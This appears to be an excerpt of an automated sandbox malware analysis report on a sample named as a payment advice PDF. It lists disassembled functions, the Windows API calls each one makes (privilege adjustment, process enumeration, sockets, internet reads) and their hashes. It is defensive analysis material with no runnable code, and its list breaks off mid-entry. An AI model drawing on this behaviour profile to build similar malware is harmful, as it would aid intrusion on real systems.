                                                              • Opcode ID: f14776eb9890f43280986085c4bb91bdc2f3994c781412d5850d91366d893695
                                                              • Instruction ID: 6bb9d8f4b782ead0e0f5bf196cdc50af36162a6b15acdb98378fc33641dabc37
                                                              • Opcode Fuzzy Hash: f14776eb9890f43280986085c4bb91bdc2f3994c781412d5850d91366d893695
                                                              • Instruction Fuzzy Hash: 1B029DB0A00209DFCF04EF68D991AAEBBF5FF44304F158069E80ADB255EB35D954CB96
                                                              Function 00841287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 008419FA
                                                              • GetSysColor.USER32(0000000F), ref: 00841A4E
                                                              • SetBkColor.GDI32(?,00000000), ref: 00841A61
                                                                • Part of subcall function 00841290: DefDlgProcW.USER32(?,00000020,?), ref: 008412D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ColorProc$LongWindow
                                                              • String ID:
                                                              • API String ID: 3744519093-0
                                                              • Opcode ID: 742a28af6b7eb505f59233ec5a2700006bf97c84919d06165694b0ee30210fee
                                                              • Instruction ID: 433b678b1fe97d128287db3b355b85c9a1bb2d3a096bc5bb054bee67a709b52b
                                                              • Opcode Fuzzy Hash: 742a28af6b7eb505f59233ec5a2700006bf97c84919d06165694b0ee30210fee
                                                              • Instruction Fuzzy Hash: BFA1587111656CBEEE28EE2C8C4CF7F3D6EFB41749B14411AF606D2196EB20CD8096B2
                                                              Function 008ABCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 008ABCE6
                                                              • _wcscmp.LIBCMT ref: 008ABD16
                                                              • _wcscmp.LIBCMT ref: 008ABD2B
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 008ABD3C
                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 008ABD6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 2387731787-0
                                                              • Opcode ID: 4a83218464a3563946244544962e3c24ef29c391e8755e709d1c853fcc25a2c5
                                                              • Instruction ID: 6f356f1f8211032158fc185c8ec2a9064fd6b28832af6b1cdb86d304623f67d0
                                                              • Opcode Fuzzy Hash: 4a83218464a3563946244544962e3c24ef29c391e8755e709d1c853fcc25a2c5
                                                              • Instruction Fuzzy Hash: 26518D356046059FE714DF68C490EAAB7E4FF4A324F10462DE956C77A2DB30ED04CB92
                                                              Function 008B6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008B7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008B7DB6
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 008B679E
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B67C7
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 008B6800
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B680D
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 008B6821
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 99427753-0
                                                              • Opcode ID: d2a69c4a64b518ff05a6fa8c37a812dc141073b5059359530f17fbacb4f4b4f3
                                                              • Instruction ID: eff2d8fb1e8cc0f245f2a6445a56db6c2bd3b2996724e6edf9185fd315826069
                                                              • Opcode Fuzzy Hash: d2a69c4a64b518ff05a6fa8c37a812dc141073b5059359530f17fbacb4f4b4f3
                                                              • Instruction Fuzzy Hash: 69419675A00218AFDB60BF288C86F6E77A4FF45714F044568FA59EB3D3DA749D008792
                                                              Function 008C5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: a72fcbf367ce0bf7ca0d6d116361d269ff53cd2cf5c76aa54469976e6cd47199
                                                              • Instruction ID: 8b04f7e398870808a7df0bbcb4ecdb793f71b54fb481d2dbf9be076710291e00
                                                              • Opcode Fuzzy Hash: a72fcbf367ce0bf7ca0d6d116361d269ff53cd2cf5c76aa54469976e6cd47199
                                                              • Instruction Fuzzy Hash: 7911B2313009556BEF216F2A9C44F6B7BB9FF857A1B40803CF946D3242DBB0ED4186A5
                                                              Function 008980A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008980C0
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008980CA
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008980D9
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008980E0
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008980F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 301424c3a20ace0ea814e8200d53d4db25d98e309bf5686c33397e0233ad8424
                                                              • Instruction ID: d4af4b41f3ad9d154516af20d790b0751dd2310d490ca26e2835809c6f4907ae
                                                              • Opcode Fuzzy Hash: 301424c3a20ace0ea814e8200d53d4db25d98e309bf5686c33397e0233ad8424
                                                              • Instruction Fuzzy Hash: 09F04F31240205EFEB115FA5EC8DE673BBDFF4A755B04002AFA46D6151CB719C41DA60
                                                              Function 008AC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 008AC432
                                                              • CoCreateInstance.OLE32(008D2D6C,00000000,00000001,008D2BDC,?), ref: 008AC44A
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • CoUninitialize.OLE32 ref: 008AC6B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                              • String ID: .lnk
                                                              • API String ID: 2683427295-24824748
                                                              • Opcode ID: 7aaaa45d86b2d2ce09acb86a843a20116205e1247b65ab369812a84f87ad0f5a
                                                              • Instruction ID: 3a7007ebfcdc677a7bd2e83d81ce1df77729523f327aaac4900a06d4191d7da8
                                                              • Opcode Fuzzy Hash: 7aaaa45d86b2d2ce09acb86a843a20116205e1247b65ab369812a84f87ad0f5a
                                                              • Instruction Fuzzy Hash: 49A11A71104209AFD700EF58C881EAFB7A8FF99354F00492DF195D7192EB71E909CB62
                                                              Function 00844B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00844AD0), ref: 00844B45
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00844B57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: 25322fb02d6bf83de5e5a5f7c5202e860a14770cd99563be43b7e6358681051a
                                                              • Instruction ID: c364b45e069bd348a99d578221db66abb66e5c02649cee65e4736bb2edc59aa3
                                                              • Opcode Fuzzy Hash: 25322fb02d6bf83de5e5a5f7c5202e860a14770cd99563be43b7e6358681051a
                                                              • Instruction Fuzzy Hash: 14D0C730A00B17CFE7208F72E828F02B2F6FF003A0B14C83EA592D2250E774E880CA14
                                                              Function 00853030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf
                                                              • String ID:
                                                              • API String ID: 674341424-0
                                                              • Opcode ID: c95c1bb661bd89f68231cafb24df8a7710b80f824f604ec34cc3eb896b51ec64
                                                              • Instruction ID: 3b8e57510b34ec4c747258ecb47bfc73c582c5025af1b6f9ab6b27d5db809377
                                                              • Opcode Fuzzy Hash: c95c1bb661bd89f68231cafb24df8a7710b80f824f604ec34cc3eb896b51ec64
                                                              • Instruction Fuzzy Hash: A72267716083049BC724EF28C891B6AB7E5FF84354F14492DF99AD7291EB71E908CB92
                                                              Function 008BEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 008BEE3D
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 008BEE4B
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 008BEF0B
                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 008BEF1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                              • String ID:
                                                              • API String ID: 2576544623-0
                                                              • Opcode ID: cedde2ea168fcb0feb12134ca933550a549645bcea35c3d985cd85bec1a6abf1
                                                              • Instruction ID: b066818754afed489887d460ebc94172052f9e1f69cb1420b3d2cb9a0204e14d
                                                              • Opcode Fuzzy Hash: cedde2ea168fcb0feb12134ca933550a549645bcea35c3d985cd85bec1a6abf1
                                                              • Instruction Fuzzy Hash: A2514D71504715AFD320EF28D885EABBBE8FF94710F50482DF595D72A2EB70A904CB92
                                                              Function 0089E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0089E628
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($|
                                                              • API String ID: 1659193697-1631851259
                                                              • Opcode ID: b970a0c16decce19a1889cce2af722e6791821f2c32a1258de6406a77167fe15
                                                              • Instruction ID: 6e514308e454298dcf9b3d69d4998309cb481605ba37a4222f32687948f1e205
                                                              • Opcode Fuzzy Hash: b970a0c16decce19a1889cce2af722e6791821f2c32a1258de6406a77167fe15
                                                              • Instruction Fuzzy Hash: 99323575A007059FDB28DF59C48096ABBF1FF58320B15C56EE89ADB3A1E770E941CB40
                                                              Function 008B22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008B180A,00000000), ref: 008B23E1
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 008B2418
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: e45b6ddcf17a10fc24c3e5766bc4e903f74191847b4894000385bd9736553e37
                                                              • Instruction ID: 1f1130058eaf4e55232a7789a250180254298b10f92cbfa13ba0a0fb7c512491
                                                              • Opcode Fuzzy Hash: e45b6ddcf17a10fc24c3e5766bc4e903f74191847b4894000385bd9736553e37
                                                              • Instruction Fuzzy Hash: 2441F271A00209BFEB109E99DC81EFFB7FCFB44324F10406AF601E6751DA759E419A65
                                                              Function 008AB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 008AB40B
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008AB465
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008AB4B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: 1da06e339fa7c2b984a40efed2b3c022fe4bd76542aa25ebe01642920c097b54
                                                              • Instruction ID: a26b4b789a408ab8eeef35490fe0335bb31ed7039f9a98fb85d1dc71952af905
                                                              • Opcode Fuzzy Hash: 1da06e339fa7c2b984a40efed2b3c022fe4bd76542aa25ebe01642920c097b54
                                                              • Instruction Fuzzy Hash: C9216235A00108DFDB00EFA9D880EEEBBB8FF49314F1480AAE945EB352DB319915CB51
                                                              Function 008987E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00860DB6: std::exception::exception.LIBCMT ref: 00860DEC
                                                                • Part of subcall function 00860DB6: __CxxThrowException@8.LIBCMT ref: 00860E01
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0089882B
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00898858
                                                              • GetLastError.KERNEL32 ref: 00898865
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1922334811-0
                                                              • Opcode ID: 4503b07f099d8f68ef1eadf5a28f9a0ddbb1c9d88562697d776397e2ab33a849
                                                              • Instruction ID: 12d243dbefd6ee33111692ed59b9b96e284d7fa7389ffa8f4e840f808351cc4b
                                                              • Opcode Fuzzy Hash: 4503b07f099d8f68ef1eadf5a28f9a0ddbb1c9d88562697d776397e2ab33a849
                                                              • Instruction Fuzzy Hash: 9C118FB2514205AFEB18EFA4DC85D6BB7F9FB45710B24862EF455D7241EB30BC408B60
                                                              Function 0089874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00898774
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0089878B
                                                              • FreeSid.ADVAPI32(?), ref: 0089879B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: 4916f0c6955f774f751d4a6163600e1eb1a91aa7b758cc8dc4eb27bd99d8a92d
                                                              • Instruction ID: 318609c8bdd96ac315eef26f1aef05882d6f744b7be153801176cf508cd3bcfc
                                                              • Opcode Fuzzy Hash: 4916f0c6955f774f751d4a6163600e1eb1a91aa7b758cc8dc4eb27bd99d8a92d
                                                              • Instruction Fuzzy Hash: C9F03C75911209BBEF00DFE49C89EADB7B9FF08601F104469AA01E2182D7715A048B50
                                                              Function 008AC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 008AC6FB
                                                              • FindClose.KERNEL32(00000000), ref: 008AC72B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: d504cb2cb598b7a8540455b66d409636ef2b774442dedb67617ef47d5262930d
                                                              • Instruction ID: e6f11e77739477e1e2fa91ef9c79b724a3c667ef78d674108bc080213efbd9af
                                                              • Opcode Fuzzy Hash: d504cb2cb598b7a8540455b66d409636ef2b774442dedb67617ef47d5262930d
                                                              • Instruction Fuzzy Hash: 35115E726006049FDB10EF2DD845A2AF7E9FF85324F04852EF9A9D7291DB30A805CF81
                                                              Function 008AA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,008B9468,?,008CFB84,?), ref: 008AA097
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,008B9468,?,008CFB84,?), ref: 008AA0A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 2988a6b6ccc805819f9bda5c9fb48ec794f1e0770423385987e19b6fbf8df3df
                                                              • Instruction ID: 9069e496c6fe05f766021efd3dc555d681f0f89aeb094c084b5f7ae6da8c07ff
